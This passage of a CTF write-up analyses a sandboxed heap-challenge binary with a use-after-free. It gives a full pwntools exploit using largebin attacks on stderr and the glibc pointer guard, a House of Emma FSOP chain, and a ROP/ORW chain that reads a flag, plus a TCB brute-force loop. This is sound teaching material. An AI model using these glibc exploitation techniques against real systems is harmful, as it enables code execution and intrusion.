  - The calls to setvbuf(stdin, 0LL, 2, 0LL), setvbuf(stdout, 0LL, 2, 0LL), and setvbuf(stderr, 0LL, 2, 0LL) disable buffering for the stdin, stdout, and stderr streams (mode 2 is _IONBF). This means all input/output operations are immediate without buffering, often done to avoid delays in interactive programs.
- prctl(38, 1LL, 0LL, 0LL, 0LL):
  - This call corresponds to the PR_SET_NO_NEW_PRIVS option (38). Setting it to 1 means the process can no longer gain new privileges through execve (for example, via setuid or setgid binaries). It is also required before an unprivileged process can install a seccomp filter.
- prctl(22, 2LL, &v1):
  - This call corresponds to PR_SET_SECCOMP (22) with SECCOMP_MODE_FILTER (2), which installs the seccomp BPF filter program described by v1. This is the sandbox mentioned earlier. The omitted code builds the filter, so its exact rules are not visible in this excerpt.
Add
_DWORD *__fastcall add(__int64 a1)
{
_DWORD *result; // rax
unsigned __int8 idx; // [rsp+1Dh] [rbp-13h]
unsigned __int16 size; // [rsp+1Eh] [rbp-12h]
idx = *(_BYTE *)(a1 + 1);
size = *(_WORD *)(a1 + 2);
if ( size <= 0x40Fu || size > 0x500u || idx > 0x10u )
{
puts("ERROR");
_exit(0);
}
pool[idx] = calloc(1uLL, size);
result = size_pool;
size_pool[idx] = size;
return result;
}
The add function reads an index (idx) and a size (size) from the opcode buffer, validates them, allocates a chunk with calloc, and records the pointer in pool and the size in size_pool.
Valid sizes are restricted to the range 0x410 to 0x500 and valid indexes to 0 through 0x10; otherwise it prints ERROR and terminates the program via _exit.
Delete
void __fastcall delete(__int64 a1)
{
unsigned __int8 idx; // [rsp+1Fh] [rbp-1h]
idx = *(_BYTE *)(a1 + 1);
if ( idx > 0x10u || !*((_QWORD *)&pool + idx) )
{
puts("Invalid idx");
_exit(0);
}
free(*((void **)&pool + idx));
}
It does not clear the pointer after freeing a chunk. This leaves a typical UAF vulnerability, which can result in chunk overlapping.
Show
int __fastcall show(__int64 a1)
{
unsigned __int8 idx; // [rsp+1Fh] [rbp-1h]
idx = *(_BYTE *)(a1 + 1);
if ( idx > 0x10u || !*((_QWORD *)&pool + idx) )
{
puts("Invalid idx");
_exit(0);
}
return puts(*((const char **)&pool + idx));
}
With the UAF primitive, we can leverage this to print out leaked information. There is no length check either: puts prints until the first null byte.
Edit
void *__fastcall edit(__int64 a1)
{
unsigned __int8 idx; // [rsp+1Dh] [rbp-3h]
unsigned __int16 size; // [rsp+1Eh] [rbp-2h]
idx = *(_BYTE *)(a1 + 1);
size = *(_WORD *)(a1 + 2);
if ( idx > 0x10u || !*((_QWORD *)&pool + idx) )
{
puts("Invalid idx");
_exit(0);
}
if ( (unsigned int)size > size_pool[idx] )
{
puts("Invalid size");
size = size_pool[idx];
}
return memcpy(*((void **)&pool + idx), (const void *)(a1 + 4), size);
}
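It copies up to size bytes from the opcode buffer (starting at a1 + 4) into the chunk selected by idx. If the requested size exceeds the recorded size_pool[idx], it is clamped to that value. Since delete does not clear the pointer, edit also works on freed chunks.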
Vm_run
__int64 __fastcall vm_run(__int64 a1)
{
  while ( 1 )
  {
    switch ( *(_BYTE *)a1 & 0xF )
    {
      case 1:
        add(a1);
        a1 += 4LL;
        puts("Malloc Done");
        break;
      case 2:
        delete(a1);
        a1 += 2LL;
        puts("Del Done");
        break;
      case 3:
        show(a1);
        a1 += 2LL;
        puts("Show Done");
        break;
      case 4:
        edit(a1);
        a1 += *(unsigned __int16 *)(a1 + 2) + 4LL;
        puts("Edit Done");
        break;
      case 5:
        return 0LL;
      case 6:
        *(_WORD *)(a1 + 3) = *(unsigned __int8 *)(a1 + 2) + *(unsigned __int8 *)(a1 + 1);
        a1 += 5LL;
        break;
      case 7:
        *(_WORD *)(a1 + 3) = *(unsigned __int8 *)(a1 + 2) - *(unsigned __int8 *)(a1 + 1);
        a1 += 5LL;
        break;
      case 8:
        *(_WORD *)(a1 + 3) = (unsigned __int8)(*(_BYTE *)(a1 + 1) ^ *(_BYTE *)(a1 + 2));
        a1 += 5LL;
        break;
      case 9:
        *(_WORD *)(a1 + 3) = *(unsigned __int8 *)(a1 + 2) * *(unsigned __int8 *)(a1 + 1);
        a1 += 5LL;
        break;
      case 0x10:
        *(_WORD *)(a1 + 3) = (unsigned __int8)(*(_BYTE *)(a1 + 2) / *(_BYTE *)(a1 + 1));
        a1 += 5LL;
        break;
      default:
        puts("Invalid opcode");
        break;
    }
  }
}
The vm_run function acts like a virtual machine interpreter, continuously reading and executing commands based on a series of opcodes from the memory location pointed to by a1. Each opcode determines the operation to be performed.
- Infinite Loop:
  - The function runs an infinite loop (while (1)) and reads opcodes from the memory location at a1.
- Opcode Handling:
  - The function checks the opcode by evaluating *(_BYTE *)a1 & 0xF, which extracts the lower 4 bits of the byte at a1. Based on this value, the function branches to different cases.
- Operations:
  - Case 1: Calls the add(a1) function (to allocate memory) and advances a1 by 4 bytes.
  - Case 2: Calls the delete(a1) function (to free memory) and advances a1 by 2 bytes.
  - Case 3: Calls the show(a1) function (to display memory) and advances a1 by 2 bytes.
  - Case 4: Calls the edit(a1) function (to modify memory) and advances a1 by the 16-bit value at a1 + 2 plus 4 bytes.
  - Case 5: Terminates the loop by returning 0, signaling the end of execution.
  - Cases 6-9, 0x10: Perform arithmetic operations (addition, subtraction, XOR, multiplication, and division) using values from memory, storing results at a1 + 3 and advancing a1 by 5 bytes. As decompiled, case 0x10 can never match, because the opcode is masked with 0xF.
- Error Handling:
  - If an invalid opcode is encountered, it prints "Invalid opcode" and continues. As decompiled, a1 is not advanced in this case, so the same byte is read again.
The vm_run function is a simple virtual machine that processes opcodes, performing actions like memory allocation (add), deletion (delete), display (show), and modification (edit). The basic arithmetic operations are just for fun :). The function continuously executes until it encounters a termination opcode (5).
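The stride rules described above can be sketched as a small disassembler. This is a hypothetical helper (walk_opcodes) written only to mirror the decompiled switch; it assumes the 16-bit fields are little-endian, and the mnemonic names are my own labels.

```python
import struct

# Bytes consumed by each fixed-width opcode, taken from the decompiled switch.
FIXED_STRIDE = {1: 4, 2: 2, 3: 2, 6: 5, 7: 5, 8: 5, 9: 5}
NAMES = {1: "add", 2: "delete", 3: "show", 4: "edit", 5: "exit",
         6: "add8", 7: "sub8", 8: "xor8", 9: "mul8"}


def walk_opcodes(buf: bytes):
    """Return (offset, mnemonic) pairs in the order vm_run would visit them."""
    pc, out = 0, []
    while pc < len(buf):
        op = buf[pc] & 0xF              # only the low nibble selects the case
        if op not in NAMES:
            out.append((pc, "invalid"))  # the real VM would spin here
            break
        out.append((pc, NAMES[op]))
        if op == 5:                      # termination opcode
            break
        if op == 4:                      # edit: 4-byte header plus payload
            (length,) = struct.unpack_from("<H", buf, pc + 2)
            pc += length + 4
        else:
            pc += FIXED_STRIDE[op]
    return out


# add(0, 0x410); edit(0, b"AB"); show(0); exit
program = bytes([1, 0, 0x10, 0x04]) + bytes([4, 0, 2, 0]) + b"AB" + bytes([3, 0, 5])
print(walk_opcodes(program))
# [(0, 'add'), (4, 'edit'), (10, 'show'), (12, 'exit')]
```

Note that edit advances by the length stored in the opcode, not by the clamped length, so the payload bytes are always skipped rather than interpreted as further opcodes.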
Methodology
The opcodes are stored in the first allocated 0x2000 chunk, and are cleared each time we leave the vm_run loop (via opcode 5).
With the vulnerabilities identified through code review, we can exploit this challenge by following these steps:
- Leak Addresses via the Use-After-Free (UAF) Primitive: Reading freed chunks leaks the LIBC and heap base addresses, and the dangling pointers let us create overlapping chunks, providing the foundation for further exploitation.
- Hijack the stderr Pointer: Using a Largebin Attack, we overwrite the stderr pointer with a known address, specifically that of the victim largebin chunk.
- Hijack the pointer_guard (__pointer_chk_guard): A second Largebin Attack overwrites the pointer_guard stored at fs:[0x30] with a known heap address, so that we can forge function pointers that survive demangling.
- Modify the Top Chunk Size: We consolidate a freed unsorted bin chunk into the top chunk, enabling us to manipulate the metadata of the overlapping top chunk.
- House of Emma Attack Chain: We forge the __io_functions.write and __cookie fields of an _IO_cookie_file structure. After pointing the vtable to _IO_cookie_jumps+0x40, the triggered I/O operation calls our forged write pointer, which hijacks RIP and gives us control of the execution flow. In my EXP, the chain uses gadgets such as getkeyserv_handle+276 and setcontext+61.
- ORW (Open, Read, Write) Chain: Finally, at the return address set up by the setcontext chain, we place an ORW chain to read the flag.
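The pointer guard step matters because the callbacks in __io_functions are stored in mangled form: on x86-64, glibc XORs the pointer with the guard and rotates it left by 0x11 bits, and reverses both steps before the call. The following minimal sketch uses made-up addresses to show that once the guard is a value we know, we can precompute an encoded pointer that demangles to any target. The function names are illustrative.

```python
MASK64 = (1 << 64) - 1


def rol64(value: int, shift: int) -> int:
    """Rotate a 64-bit value left."""
    return ((value << shift) | (value >> (64 - shift))) & MASK64


def ror64(value: int, shift: int) -> int:
    """Rotate a 64-bit value right."""
    return ((value >> shift) | (value << (64 - shift))) & MASK64


def ptr_mangle(ptr: int, guard: int) -> int:
    """What we must store: xor with the guard, then rol 0x11."""
    return rol64(ptr ^ guard, 0x11)


def ptr_demangle(enc: int, guard: int) -> int:
    """What glibc computes before the call: ror 0x11, then xor with the guard."""
    return ror64(enc, 0x11) ^ guard


guard = 0x000055555555B2A0    # made-up heap address written by the largebin attack
target = 0x00007FFFF7F46020   # made-up gadget address
enc = ptr_mangle(target, guard)
print(hex(enc), hex(ptr_demangle(enc, guard)))
```

With the original random guard we could not compute enc, which is why the guard has to be replaced before the fake _IO_cookie_file is used.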
Brute Force TCB
We mentioned earlier that the pointer guard is stored at fs:[0x30], which can be viewed in GDB, allowing us to calculate its offset relative to the leaked LIBC base address.
However, this offset can vary across different environments, as the TLS area is set up dynamically by the linker (ld). Additionally, random padding between the ld and LIBC base addresses makes it harder to pinpoint the exact location.
When exploiting this type of challenge on a remote server, it may become necessary to brute-force the address of the Thread Control Block (TCB) that the FS register points to. The lower 12 bits of the TCB address remain constant, so the brute-forcing process typically focuses on the 4th, 5th, and 6th hex digits of the 64-bit address. Here's an example of a brute-forcing script, which fixes the 6th digit at 6 and enumerates the 4th and 5th:
for x in range(0x10):
    for y in range(0x10):
        try:
            libc_base = 0xdeadbeef
            offset = 0x6 << 20   # 6th: i.e. starts from 0x600000
            offset += x << 16    # 5th: from 0x600000 to 0x6F0000
            offset += y << 12    # 4th: Increment within each 0x1000 (4KB) memory page
            ld_base = libc_base + offset
            log.success("try offset:\t" + hex(offset))
            # exploit script
            exp()
        except EOFError:
            p.close()
As an alternative, we can also set up a Docker environment to simulate the remote target, allowing us to test and identify the ld base address before launching the actual exploit.
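The search space of the brute-force loop shown earlier can also be enumerated up front, which makes it easy to count the attempts or reorder them. This is a minimal sketch that assumes, as the script does, that the sixth hex digit of the offset is 6; candidate_offsets is a hypothetical helper.

```python
def candidate_offsets(sixth_digit: int = 0x6):
    """Yield every page-aligned offset covered by the brute-force loop."""
    for x in range(0x10):           # 5th hex digit
        for y in range(0x10):       # 4th hex digit
            yield (sixth_digit << 20) | (x << 16) | (y << 12)


offsets = list(candidate_offsets())
print(len(offsets), hex(offsets[0]), hex(offsets[-1]))  # 256 0x600000 0x6ff000
```

At most 256 connections are needed for one value of the sixth digit; if that assumption is wrong for the target, the same generator can be called with a different sixth_digit.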
EXP
Detailed explanations are provided in the comments of the Python script. You will need to adjust the pointer guard address (ptr_guard_addr) to match the offset in your environment:
from pwn import *
import inspect
import os
import sys

def g(gdbscript=''):
    # Attach GDB to the local process or the remote gdbserver
    if mode['local']:
        sysroot = None
        if libc_path != '':
            sysroot = os.path.dirname(libc_path)
        gdb.attach(p, gdbscript=gdbscript, sysroot=sysroot)
        if gdbscript == '':
            input()
    elif mode['remote']:
        gdb.attach((remote_ip_addr, remote_port), gdbscript)
        if gdbscript == '':
            input()

def pa(addr):
    # Log an address together with the name of the caller's variable holding it
    frame = inspect.currentframe().f_back
    variables = {k: v for k, v in frame.f_locals.items() if v is addr}
    desc = next(iter(variables.keys()), "unknown")
    info('@{} ---> %#x'.format(desc), addr)

s = lambda data :p.send(data)
sa = lambda delim,data :p.sendafter(delim, data)
sl = lambda data :p.sendline(data)
sla = lambda delim,data :p.sendlineafter(delim, data)
r = lambda num=4096 :p.recv(num)
ru = lambda delim, drop=True :p.recvuntil(delim, drop)
l64 = lambda :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu64 = lambda data :u64(data.ljust(8, b'\0'))

def rol(xor, shift, bit_size):
    """Performs a bitwise left rotate (ROL) on the XORed value."""
    return ((xor << shift) | (xor >> (bit_size - shift))) & ((1 << bit_size) - 1)

def PTR_MANGLE(ptr, ptr_guard, shift, bit_size):
    xor = ptr ^ ptr_guard
    return rol(xor, shift, bit_size)

def add(idx, size):
    global opcodes
    op = p8(0x1)
    op += p8(idx)
    op += p16(size)
    opcodes += op

def free(idx):
    global opcodes
    op = p8(0x2)
    op += p8(idx)
    opcodes += op

def edit(idx, buf):
    global opcodes
    op = p8(0x4)
    op += p8(idx)
    op += p16(len(buf))
    op += buf
    opcodes += op

def show(idx):
    global opcodes
    op = p8(0x3)
    op += p8(idx)
    opcodes += op

def run_opcode():
    # Terminate the queued opcodes with option 5 and send them in one batch
    global opcodes
    opcodes += p8(0x5)
    sa(b"opcode\n", opcodes)
    # print('[!] Run opcodes: ', str(opcodes))
    opcodes = b""

opcodes = b''
deadbeef = p64(0xdeadbeef)
def exp():
    # -------- 1 -------- Leak Addresses
    # UAF
    add(0, 0x410)
    add(1, 0x410)
    add(2, 0x420)
    add(3, 0x410)
    free(2)        # 2 -> usbin
    add(4, 0x430)  # 2 -> lbin
    show(2)
    run_opcode()
    libc_base = l64() - 0x1f30b0  # main_arena + 1104
    pa(libc_base)

    edit(2, b'a'*0x10)
    show(2)
    run_opcode()
    ru(b'a'*0x10)
    heap_base = uu64(r(6)) - 0x2ae0
    pa(heap_base)

    # ------- 2 -------- Bullets
    stderr = libc_base + libc.sym['stderr']
    _IO_cookie_jumps = libc_base + libc.sym['_IO_cookie_jumps']
    ptr_guard_addr = libc_base - 0x28c0 + 0x30  # fs:[0x30]
    setcontext = libc_base + libc.sym['setcontext'] + 61
    mprotect = libc_base + libc.sym['mprotect']
    gksh_gadget = libc_base + 0x146020  # mov rdx, [rdi + 8]; mov [rsp], rax; call [rdx + 0x20];
    pa(stderr)
    pa(ptr_guard_addr)
    pa(_IO_cookie_jumps)
    pa(setcontext)
    pa(gksh_gadget)

    rop = ROP(libc)
    p_rdi_r = libc_base + rop.find_gadget(['pop rdi', 'ret'])[0]
    p_rsi_r = libc_base + rop.find_gadget(['pop rsi', 'ret'])[0]
    p_rdx_rbx_r = libc_base + rop.find_gadget(['pop rdx', 'pop rbx', 'ret'])[0]
    p_rax_r = libc_base + rop.find_gadget(['pop rax', 'ret'])[0]
    syscall_r = libc_base + rop.find_gadget(['syscall', 'ret'])[0]
    ret = libc_base + rop.find_gadget(['ret'])[0]

    fakeIO_addr = heap_base+0x22a0  # chunk 0
    mprotect_chain = [p_rdi_r, fakeIO_addr&(~0xfff), p_rsi_r, 0x4000,
                      p_rdx_rbx_r, 7, 0, mprotect, fakeIO_addr+0x140]  # 0x48 bytes
    orw_chain = asm(shellcraft.cat('./flag'))  # 0x23 bytes
    pa(fakeIO_addr)

    # -------- 3 -------- Largebin Attack stderr
    free(0)
    pl = flat({
        0x0: [libc_base+0x1f30b0, libc_base+0x1f30b0],
        0x10: [heap_base+0x2ae0, stderr-0x20],  # hijack bk_nextsize
    })
    edit(2, pl)    # 2 -> lbin larger
    add(5, 0x430)  # 0 -> lbin smaller <- *stderr
    # recover 2
    pl = flat({
        0x0: [heap_base+0x22a0, libc_base+0x1f30b0],
        0x10: [heap_base+0x22a0, heap_base+0x22a0],  # address of heap 0
    })
    edit(2, pl)
    # recover 0
    pl = flat({
        0x0: [libc_base+0x1f30b0, heap_base+0x2ae0],
        0x10: [heap_base+0x2ae0, heap_base+0x2ae0],  # address of heap 2
    })
    edit(0, pl)
    add(2, 0x420)
    add(0, 0x410)
    run_opcode()

    # -------- 4 -------- Largebin Attack Pointer Guard
    free(2)
    add(6, 0x430)
    free(0)
    pl = flat({
        0x0: [libc_base+0x1f30b0, libc_base+0x1f30b0],
        0x10: [heap_base+0x2ae0, ptr_guard_addr-0x20],  # hijack bk_nextsize
    })
    edit(2, pl)    # 2 -> lbin larger
    add(7, 0x450)  # 0 -> lbin smaller <- *ptr_guard_addr
    # recover 2
    pl = flat({
        0x0: [heap_base+0x22a0, libc_base+0x1f30b0],
        0x10: [heap_base+0x22a0, heap_base+0x22a0],  # address of heap 0
    })
    edit(2, pl)
    # recover 0
    pl = flat({
        0x0: [libc_base+0x1f30b0, heap_base+0x2ae0],
        0x10: [heap_base+0x2ae0, heap_base+0x2ae0],  # address of heap 2
    })
    edit(0, pl)
    add(2, 0x420)
    add(0, 0x410)

    # -------- 5 -------- House of Kiwi
    # change top chunk size
    free(7)  # 7 -> top chunk
    add(8, 0x430)
    edit(7, b'a'*0x438+p64(0x300))
    run_opcode()

    # FSOP
    pl = flat({
        # fake stderr & _IO_cookie_file
        0: {
            0x0: 0,                       # _flag
            0x20: 0,                      # _IO_write_base
            0x28: 1,                      # _IO_write_ptr
            0x38: 0,                      # _IO_buf_base
            0x40: 0,                      # _IO_buf_end
            0x68: 0,                      # _chain
            0x88: fakeIO_addr+0x300,      # _lock
            0xc0: 0,                      # mode
            0xd8: _IO_cookie_jumps+0x40,  # vtable
            0xe0: fakeIO_addr + 0x100,    # rdi
            # mov rdx, [rdi + 8]; mov [rsp], rax; call [rdx + 0x20];
            0xf0: PTR_MANGLE(gksh_gadget, heap_base+0x22a0, 0x11, 64),  # enc
        },
        # ORW
        0x100: {
            0x8: fakeIO_addr + 0x100,  # rdx
            # <+61>: mov rsp, [rdx+0xa0]
            # <+294>: mov rcx, [rdx+0xa8]
            # <+301>: push rcx
            # <+334>: ret
            0x20: setcontext,  # gksh_gadget ->
            0x40: orw_chain,   # mprotect ->
            0xa0: [fakeIO_addr+0x200, ret],
        },
        0x200: {
            0x0: mprotect_chain,
        }
    }, filler=b'\0')
    # fakeIO_addr is the chunk address, so skip the 0x10-byte chunk header
    edit(0, pl[0x10:])
    # g()

    # trigger
    add(8, 0x450)  # b'\x01\x08P\x04\x05'
    """
    Manually trigger after breakpoint:
    printf '\x01\x08P\x04\x05' > pl.bin
    cat pl.bin > /proc/<pid>/fd/0
    """
    run_opcode()
    # g()
    p.interactive()
if __name__ == '__main__':
    file_path = './pwn'
    libc_path = './libc.so.6'
    ld_path = './ld.so'
    context(arch='amd64', os='linux', endian='little')
    # context.log_level='debug'
    e = ELF(file_path, checksec=False)
    mode = {'local': False, 'remote': False, }
    env = None
    if len(sys.argv) > 1:
        if libc_path != '':
            libc = ELF(libc_path)
        p = remote(sys.argv[1], int(sys.argv[2]))
        mode['remote'] = True
        remote_ip_addr = sys.argv[1]
        remote_port = int(sys.argv[2])
    else:
        if libc_path != '':
            libc = ELF(libc_path)
            env = {'LD_PRELOAD': libc_path}
        if ld_path != '':
            cmd = [ld_path, '--library-path', os.path.dirname(os.path.abspath(libc_path)), file_path]
            p = process(cmd, env=env)
        else:
            p = process(file_path, env=env)
        mode['local'] = True
    exp()
Pwned: